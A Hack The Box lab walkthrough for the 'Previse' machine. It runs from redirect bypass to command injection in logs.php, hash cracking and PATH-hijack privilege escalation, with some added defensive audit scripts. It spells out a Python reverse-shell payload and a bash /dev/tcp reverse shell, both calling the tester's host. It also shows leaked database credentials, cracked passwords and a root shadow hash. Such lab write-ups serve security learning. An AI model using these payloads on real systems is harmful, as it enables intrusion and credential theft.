Hack The Box walkthrough: Previse

Introduction

OS: Linux
Difficulty: Easy
Points: 20
Release: 07 Aug 2021
IP: 10.10.11.104


Enumeration

Nmap

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

ffuf

index.php [Status: 302, Size: 2801, Words: 737, Lines: 72]
login.php [Status: 200, Size: 2224, Words: 486, Lines: 54]
config.php [Status: 200, Size: 0, Words: 1, Lines: 1]
download.php [Status: 302, Size: 0, Words: 1, Lines: 1]
footer.php [Status: 200, Size: 217, Words: 10, Lines: 6]
header.php [Status: 200, Size: 980, Words: 183, Lines: 21]
favicon.ico [Status: 200, Size: 15406, Words: 15, Lines: 10]
logout.php [Status: 302, Size: 0, Words: 1, Lines: 1]
. [Status: 302, Size: 2801, Words: 737, Lines: 72]
status.php [Status: 302, Size: 2966, Words: 749, Lines: 75]
nav.php [Status: 200, Size: 1248, Words: 462, Lines: 32]
accounts.php [Status: 302, Size: 3994, Words: 1096, Lines: 94]
files.php [Status: 302, Size: 4914, Words: 1531, Lines: 113]

curl

curl http://10.10.11.104/files.php

So it seems we can access parts of the site with a few tricks. Testing further showed I can capture the request from nav.php and then change the response from a 302 to a 200 to access the accounts page.

Clicking on Do Intercept > Response to this request.

Change the 302 to 200

Create a new user and use the same tactics for capturing the request and editing the response.

Then login with the new account.
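The ffuf listing above already shows the flaw this interception trick relies on: index.php, status.php, accounts.php and files.php answer 302 yet return bodies of several kilobytes, while download.php and logout.php answer 302 with Size 0. A redirect that carries a full body means the PHP guard sends header('Location: ...') without the exit that should follow it, so the page keeps rendering and only the browser enforces the redirect. The script below is added here and is not part of the original write-up; it pulls that signal out of ffuf output, and the sample lines are constructed from the table above.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): flag endpoints that answer with
# a redirect but still return a page body. That combination is the sign that the
# server-side guard does header('Location: login.php') without exit, so the
# protected page renders anyway and only the client honours the redirect.

# Constructed sample in the shape of the ffuf lines above.
SAMPLE_FFUF='index.php [Status: 302, Size: 2801, Words: 737, Lines: 72]
login.php [Status: 200, Size: 2224, Words: 486, Lines: 54]
download.php [Status: 302, Size: 0, Words: 1, Lines: 1]
logout.php [Status: 302, Size: 0, Words: 1, Lines: 1]
accounts.php [Status: 302, Size: 3994, Words: 1096, Lines: 94]'

# leaky_redirects MIN_BYTES   (reads ffuf lines on stdin)
# Prints the path of every 3xx response whose body is larger than MIN_BYTES.
# A redirect that correctly stops rendering has Size: 0, like download.php.
leaky_redirects() {
    min_bytes="${1:-0}"
    awk -v min="$min_bytes" '
        /\[Status: 3[0-9][0-9],/ {
            size = $0
            sub(/.*Size: /, "", size)   # drop everything before the size value
            sub(/,.*/,      "", size)   # drop everything after it
            if (size + 0 > min) print $1
        }'
}

# Wrapper over the embedded sample so the script runs stand-alone.
leaky_in_sample() {
    printf '%s\n' "$SAMPLE_FFUF" | leaky_redirects "${1:-0}"
}

leaky_in_sample 0
```

Run it against real ffuf output with `ffuf ... | leaky_redirects 0`. The server-side fix is the pattern logs.php already uses at its top: `header('Location: login.php'); exit;`. With the exit in place the body is empty, and rewriting the status line in the intercepted response yields nothing.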

Files

  • config.php
$host = 'localhost';
$user = 'root';
$passwd = 'mySQL_p@ssw0rd!:)';
$db = 'previse';
  • logs.php
┌──(root💀kali)-[~/hackthebox/machine/previse/siteBackup]
└─# ls
accounts.php download.php files.php header.php login.php logs.php status.php
config.php file_logs.php footer.php index.php logout.php nav.php
┌──(root💀kali)-[~/hackthebox/machine/previse/siteBackup]
└─# cat logs.php
<?php
session_start();
if (!isset($_SESSION['user'])) {
header('Location: login.php');
exit;
}
?>

<?php
if (!$_SERVER['REQUEST_METHOD'] == 'POST') {
header('Location: login.php');
exit;
}

/////////////////////////////////////////////////////////////////////////////////////
//I tried really hard to parse the log delims in PHP, but python was SO MUCH EASIER//
/////////////////////////////////////////////////////////////////////////////////////

$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
echo $output;

$filepath = "/var/www/out.log";
$filename = "out.log";

if(file_exists($filepath)) {
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($filepath).'"');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($filepath));
ob_clean(); // Discard data in the output buffer
flush(); // Flush system headers
readfile($filepath);
die();
} else {
http_response_code(404);
die();
}
?>

In logs.php we can see that the developer shells out to a Python script rather than parsing the delimiters in PHP, and the delim value from the POST body is interpolated straight into the exec() command line without validation or quoting, so this looks vulnerable to command injection.
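Two more things stand out in the file. The method check `if (!$_SERVER['REQUEST_METHOD'] == 'POST')` never fires, because `!` binds before `==`: it compares a boolean with the string 'POST', which is always false. And since exec() hands its string to /bin/sh -c, the `;` in the delim value is a shell statement separator, which is all the injection needs. The script below is added here and is not code from the box: find_exec_sinks is a grep-based audit for PHP command-execution calls that take request data directly (it would have flagged this file), and is_valid_delim / run_log_process show the allowlist check the delim value should pass before anything is executed. The allowed names comma, space and tab are an assumption; the walkthrough only ever sends "comma", and the Python script itself is not shown, so a stub stands in for it.

```shell
#!/bin/sh
# Added example, not code from the box. find_exec_sinks audits PHP source for
# exec-family calls fed from request superglobals; is_valid_delim and
# run_log_process show the allowlist check plus a single-argument invocation.
# The allowlist (comma, space, tab) is an assumption.

# Constructed sample in the shape of logs.php above, plus one extra sink and one
# harmless exec call to show what is and is not flagged.
SAMPLE_PHP='<?php
session_start();
$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST["delim"]}");
echo $output;
$fh = popen("ls " . $_GET["dir"], "r");
$who = exec("/usr/bin/id");'

# find_exec_sinks FILE
# Prints LINENO:text for each line where an exec-family call and a request
# superglobal appear in the same call. Exit status is grep status: 0 if any match.
find_exec_sinks() {
    grep -nE '(exec|system|passthru|popen|proc_open)[[:space:]]*\(.*\$_(POST|GET|REQUEST|COOKIE)' "$1"
}

# audit_sample -> the line numbers flagged in the constructed sample (3 and 5).
audit_sample() {
    tmp=$(mktemp)
    printf '%s\n' "$SAMPLE_PHP" > "$tmp"
    find_exec_sinks "$tmp" | cut -d: -f1
    rm -f "$tmp"
}

# is_valid_delim NAME -> 0 only for a name on the allowlist. Anything else,
# including a value with a ';' appended, is rejected before it reaches a shell.
is_valid_delim() {
    case "$1" in
        comma|space|tab) return 0 ;;
        *)               return 1 ;;
    esac
}

# Stand-in for /opt/scripts/log_process.py (assumption: the real script is not
# shown). It reports how many arguments arrived and what the first one was, so it
# is visible that a validated, properly quoted value arrives as exactly one argument.
log_process_stub() { printf 'argc=%d delim=[%s]\n' "$#" "$1"; }

# run_log_process NAME: validate, then invoke with the value as one argv element.
# Returns 2 and prints nothing on stdout for a rejected value.
run_log_process() {
    is_valid_delim "$1" || { printf 'rejected delim: %s\n' "$1" >&2; return 2; }
    log_process_stub "$1"
}

audit_sample
run_log_process comma
run_log_process 'comma;id' || true
```

The same check in PHP is `if (!in_array($_POST['delim'] ?? '', ['comma', 'space', 'tab'], true)) { http_response_code(400); exit; }` before the exec() call, with the value passed through `escapeshellarg()` when the command line is built. escapeshellarg alone would neutralise the `;`, but the allowlist is the real control: only a handful of delimiter names are meaningful, so nothing else should ever be forwarded.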

User

Reverse shell

To get a reverse shell, log in as the new user and go to the Management menu > Logs. Capture the request in Burp and put a Python reverse shell into the delim parameter.

POST /logs.php HTTP/1.1
Host: 10.10.11.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
Origin: http://10.10.11.104
Connection: close
Referer: http://10.10.11.104/file_logs.php
Cookie: PHPSESSID=1ef4dj4rj6qthba48f58r5d3va
Upgrade-Insecure-Requests: 1



delim=comma;python3+-c+'import+os,pty,socket%3bs%3dsocket.socket()%3bs.connect(("10.10.14.31",9999))%3b[os.dup2(s.fileno(),f)for+f+in(0,1,2)]%3bpty.spawn("/bin/bash")'

Have your netcat listener ready!

┌──(root💀kali)-[~]
└─# rlwrap -cAr nc -lnvp 9999
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 10.10.11.104.
Ncat: Connection from 10.10.11.104:58472.
id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
whoami
www-data

mysql

Let’s get any info and hashes from the database.

mysql -u root -p
pass:mySQL_p@ssw0rd!:)

show databases;
use previse;
show tables;

select * from accounts;
select * from accounts;
+----+----------+------------------------------------+---------------------+
| id | username | password | created_at |
+----+----------+------------------------------------+---------------------+
| 1 | m4lwhere | $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. | 2021-05-27 18:18:36 |
| 2 | omwsec | $1$🧂llol$SvtRsZqR3Wg4M1IAk.glQ. | 2021-08-08 07:09:48 |
| 3 | hello | $1$🧂llol$6gzMmYsDY2EBz35vH5gST. | 2021-08-08 07:10:42 |
| 4 | admin1 | $1$🧂llol$UQb0RhzDERebjcLHQXEim. | 2021-08-08 14:12:25 |
+----+----------+------------------------------------+---------------------+
4 rows in set (0.00 sec)

Cracking the hash

  • hashcat
hashcat64.exe -a 0 -m 500 password.txt rockyou.txt

Now we have the passwords:

D:\hashcat-5.1.0\hashcat-5.1.0>hashcat64.exe -a 0 -m 500 password.txt rockyou.txt --show
$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.:ilovecody112235!
$1$🧂llol$UQb0RhzDERebjcLHQXEim.:admin1
$1$🧂llol$6gzMmYsDY2EBz35vH5gST.:hello
  • john
john --format=md5crypt-long --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
m4lwhere:ilovecody112235!
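Why the hashes fell so quickly is worth spelling out. Every row in the accounts table is md5crypt (the `$1$` prefix, hashcat mode 500), a fast hash, and every row carries the same salt `🧂llol`, so the application is hashing with a fixed salt: equal passwords give equal hashes and one wordlist pass attacks all users at once. The script below is added here and is not from the walkthrough; it audits a user:hash dump for both weaknesses, using the hashes from the table above as constructed input.

```shell
#!/bin/sh
# Added example (not from the walkthrough): audit a dump of crypt(3)-style password
# hashes for a weak algorithm and for salt reuse across rows.

# Constructed input: the hashes from the accounts table, one user:hash per line.
SAMPLE_HASHES='m4lwhere:$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.
omwsec:$1$🧂llol$SvtRsZqR3Wg4M1IAk.glQ.
hello:$1$🧂llol$6gzMmYsDY2EBz35vH5gST.
admin1:$1$🧂llol$UQb0RhzDERebjcLHQXEim.'

# hash_algorithm HASH -> the crypt family named by the $id$ prefix.
hash_algorithm() {
    case "$1" in
        '$1$'*)         printf 'md5crypt\n' ;;
        '$2'[aby]'$'*)  printf 'bcrypt\n' ;;
        '$5$'*)         printf 'sha256crypt\n' ;;
        '$6$'*)         printf 'sha512crypt\n' ;;
        '$argon2'*)     printf 'argon2\n' ;;
        '$y$'*)         printf 'yescrypt\n' ;;
        *)              printf 'unknown\n' ;;
    esac
}

# hash_salt HASH -> the salt field of a $id$salt$digest string.
hash_salt() {
    printf '%s\n' "$1" | cut -d'$' -f3
}

# reused_salts  (user:hash lines on stdin)
# Prints "COUNT SALT" for every salt that appears more than once. A table where
# each password was hashed with its own random salt prints nothing.
reused_salts() {
    cut -d: -f2 | cut -d'$' -f3 | sort | uniq -c | awk '$1 > 1 {print $1, $2}'
}

# weak_algorithms  (user:hash lines on stdin)
# Prints "USER ALGO" for every hash not produced by a slow, modern scheme.
weak_algorithms() {
    while IFS=: read -r user hash; do
        algo=$(hash_algorithm "$hash")
        case "$algo" in
            bcrypt|sha256crypt|sha512crypt|argon2|yescrypt) ;;
            *) printf '%s %s\n' "$user" "$algo" ;;
        esac
    done
}

printf '%s\n' "$SAMPLE_HASHES" | reused_salts
printf '%s\n' "$SAMPLE_HASHES" | weak_algorithms
```

Feed it a real dump with `mysql -N -e 'select username,password from accounts' previse | tr '\t' ':' | reused_salts`. A fixed salt is the finding to fix first: PHP's password_hash() generates a fresh random salt per call and defaults to bcrypt, which would have removed both weaknesses.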

Time to SSH into the box for a better shell.

┌──(root💀kali)-[~/hackthebox/machine/previse]
└─# ssh m4lwhere@10.10.11.104
m4lwhere@10.10.11.104's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-151-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Sun Aug 8 14:40:53 UTC 2021

System load: 0.0 Processes: 174
Usage of /: 49.3% of 4.85GB Users logged in: 0
Memory usage: 29% IP address for eth0: 10.10.11.104
Swap usage: 0%


0 updates can be applied immediately.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sun Aug 8 12:54:42 2021 from 10.10.14.31
m4lwhere@previse:~$ id
uid=1000(m4lwhere) gid=1000(m4lwhere) groups=1000(m4lwhere)
m4lwhere@previse:~$ \whoami
m4lwhere
m4lwhere@previse:~$ cat user.txt
a8d88d4c17d4b65e6875b1f9ef2aee31

Root

m4lwhere@previse:~$ sudo -l
[sudo] password for m4lwhere:
User m4lwhere may run the following commands on previse:
(root) /opt/scripts/access_backup.sh
m4lwhere@previse:~$ cat /opt/scripts/access_backup.sh
#!/bin/bash

# We always make sure to store logs, we take security SERIOUSLY here

# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time

gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz

The script runs as root through sudo and calls gzip by bare name, so let’s try PATH abuse: a gzip placed in a directory that comes earlier in PATH will be the one that runs.

nano gzip

#!/bin/bash

bash -i >& /dev/tcp/10.10.14.31/2234 0>&1
m4lwhere@previse:/tmp$ chmod +x gzip
m4lwhere@previse:/tmp$ export PATH=$(pwd):$PATH
m4lwhere@previse:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
m4lwhere@previse:/tmp$ sudo /opt/scripts/access_backup.sh

And we get a root reverse shell.

┌──(root💀kali)-[~/hackthebox/machine/previse]
└─# nc -lvp 2234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::2234
Ncat: Listening on 0.0.0.0:2234
Ncat: Connection from 10.10.11.104.
Ncat: Connection from 10.10.11.104:37304.
root@previse:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root)
root@previse:/tmp# whoami
whoami
root
root@previse:/tmp# cd /root
cd /root
root@previse:/root# cat root.txt
cat root.txt
5b0c3562a1e4ab347a5445ec95ffaedf
root@previse:/root# cat /etc/shadow | grep root
cat /etc/shadow | grep root
root:$6$QJgW9tG2$yIhp0MQm9b4ok8j9su9H0hJ.GuwI5AHusMrZBQv2oLfvotY5YR0MJ82zJ4xi5WCKQSWn/a3HO/M/TjS/YC0Mk1:18824:0:99999:7:::

Summary of knowledge

  • Create a user by changing the response status code from 302 to 200
  • Get a reverse shell through PHP command injection in logs.php
  • Crack the md5crypt hashes with hashcat or john
  • Privesc with PATH hijacking of gzip in a sudo script

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more…